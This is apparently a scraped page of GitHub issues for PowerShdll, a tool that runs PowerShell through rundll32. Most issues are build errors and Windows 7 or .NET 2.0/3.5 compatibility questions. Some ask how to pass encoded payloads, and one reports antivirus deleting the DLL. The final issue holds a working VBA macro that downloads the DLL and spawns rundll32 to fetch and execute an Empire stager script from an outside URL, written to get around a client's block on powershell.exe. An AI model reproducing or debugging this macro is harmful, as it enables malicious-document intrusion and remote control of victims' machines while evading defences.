p3nt4 / powershdll Goto Github PK

Hello,

Any idea why when I compile the dll projet after a git clone I have this error:

After compilation I was trying to start rundll32.exe powerhsell.dll,main -w but got missing entry "main"
How to fix it? Nothing changed in source code

Is it possible to pass base64 encoded powershell commands?
Similar to powershell -ep bypass -nop -enc XXXXXX

I have a question about deduced target to 2.0 and 3.5.
Reference System.Management.Automation.dll in your code, but this is the net framework 4.5.
For the 4.5 framework, the code works perfectly, but there are dependencies problem for the 3.5 framework.
Is there any way to solve it? For example, a System.Management.Automation.dll v2.0.I do not understand how you solved it in your code.
Thank you for your help.

Here is my modified test code:

using System;
using System.Text;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace pws
{
public class pwd
{
[DllExport("main", CallingConvention = CallingConvention.Cdecl)]
public static void main(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
{
Runspace runspace;
runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
string cmd = @"start-process e:\test.exe";
try
{
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(cmd);
pipeline.Commands.Add("Out-String");
Collection results = pipeline.Invoke();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.AppendLine(obj.ToString());
}
}
catch (Exception e)
{
string errorText = e.Message + "\n";
}
runspace.Close();
return;
}
}
}

I can't compile PowerShdll with .net framework 2.0 version, is it possible to add support for that?

On Windows 2008, .net framework 3.5 is not installed by default.

Hi,

Is it possible to pass some arguments such that it can execute, for instance, an encoded payload ? Something like:

rundll32.exe PowerShDll,main -enc <encoded_payload>

Thx.

Tried to run this command regsvcs.exe C:\Users\xxxx\Desktop\PowerShdll-master\dll\bin\x86\Release\PowerShdll.dll . the dll was deleted by antivirus.

When I executed this code on windows7 32bit, there is a problem.
:
Stopped working
:
problem name: APPCRASH
Application Name: rundll32.exe
Application Version: 6.1.7600.16385
Application Timestamp: 4a5bc637
Fault Module Name: KERNELBASE.dll
Fault Module Version: 6.1.7601.17514
Fault Module Timestamp: 4ce7b8f0
Exception Code: e0434f4d
Exception Offset: 0000b760
OS : 6.1.7601.2.1.0.256.48
area ID: 2052

Figured I would let you all know that this code is being flagged as malware. The DLL file that is.

apparently the project isn't working correctly

I am getting an error "A dynamic Link Library (DLL) initialization routine failed" any ideas on how to fix this? Thanks.

Trying to figure out why I can't seem to have a working build. VS community 2019.

As you can see from the pic, it successfully builds. I even delete the dlls and rebuild and build works fine.

But then it says Missing entry: main.

Hello, friend!
This is a very useful project.
I had a problem with executing code on windows7，“Run32dll stops working”.But it's okay to execute code on windows10.
Does this project not support the Windows7 operating system?

First of all: thanks for this awesome project!

I'm trying to execute PowerShdll via a VBA macro (client blocks powershell.exe, and I want an Empire agent), by first downloading the dll (DownloadDLL()) and then executing the downloaded PowerShdll.dll by letting it downloading a script to execute (Empire stager). This works when I execute StrCmd in a cmd.exe, but does not work when executing it via the following VBA script:

Public Function Debugging() As Variant
    DownloadDLL
    Dim StrCmd As String
    StrCmd = "C:\Windows\System32\rundll32.exe C:\Temp\PowerShdll.dll,main . { iwr -useb https://cl.ly/kgIa/stager.ps1 } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create StrCmd, Null, objConfig, intProcessID
End Function

Sub DownloadDLL()

    Dim myURL As String
    myURL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", myURL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "C:\Temp\PowerShdll.dll", 2
        oStream.Close
    End If

End Sub

This results in the following error message:

Problem signature:
  Problem Event Name:	CLR20r3
  Problem Signature 01:	rundll32.exe
  Problem Signature 02:	6.3.9600.17415
  Problem Signature 03:	54504eb8
  Problem Signature 04:	mscorlib
  Problem Signature 05:	4.0.30319.36366
  Problem Signature 06:	57a0f7f9
  Problem Signature 07:	4528
  Problem Signature 08:	9a
  Problem Signature 09:	System.IO.IOException
  OS Version:	6.3.9600.2.0.0.272.7
  Locale ID:	1033
  Additional Information 1:	6ebd
  Additional Information 2:	6ebd833e076778d4646eaf22a3f76243
  Additional Information 3:	e34d
  Additional Information 4:	e34d4e50642e55705797b1cdfa61a4c5

Any clue as to how I can fix this? Thanks in advance!